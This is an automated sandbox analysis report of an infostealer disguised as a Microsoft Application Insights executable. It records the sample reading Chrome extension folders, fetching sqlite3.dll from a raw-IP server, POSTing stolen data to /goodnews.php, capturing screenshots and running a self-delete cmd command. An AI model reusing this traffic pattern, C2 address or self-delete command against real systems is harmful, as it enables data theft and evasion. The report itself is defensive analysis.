Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose, 2_2_00404DD0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 13 Sep 2021 13:55:33 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: keep-aliveLast-Modified: Tue, 24 Aug 2021 22:41:19 GMTETag: "9d9d8-5ca55d50d41c0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://dc.services.visualstudio.com/v2/trackY87C19923:
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XBAIMOPZ.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: XBAIMOPZ.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: XBAIMOPZ.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403E70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_00403E70
Source: global traffic HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040A840 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_0040A840
Creates a DirectInput object (often for capturing keystrokes)
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
.NET source code contains very large array initializations
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/C92710D4.cs Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Uses 32bit PE files
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
One or more processes crash
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Detected potential crypto function
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_00B0D8BE 0_2_00B0D8BE
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDDA8C 0_2_02DDDA8C
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDC088 0_2_02DDC088
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDE150 0_2_02DDE150
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 0_2_02DDA698 0_2_02DDA698
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040F550 2_2_0040F550
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040EF50 2_2_0040EF50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040F360 2_2_0040F360
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040FDE0 2_2_0040FDE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_005AD8BE 2_2_005AD8BE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: String function: 00403C80 appears 466 times
Sample file is different than original file name gathered from version info
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAntiDump.dll2 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.727920654.0000000000B3F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000002.00000000.675135509.00000000005DF000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
PE file contains more sections than normal
Source: sqlite3.dll.2.dr Static PE information: Number of sections : 19 > 10
Source: sqlite3[1].dll.2.dr Static PE information: Number of sections : 19 > 10
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Virustotal: Detection: 40%
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File read: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Jump to behavior
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp Jump to behavior
Source: classification engine Classification label: mal72.spyw.evad.winEXE@9/9@0/1
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3.dll.2.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.2.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
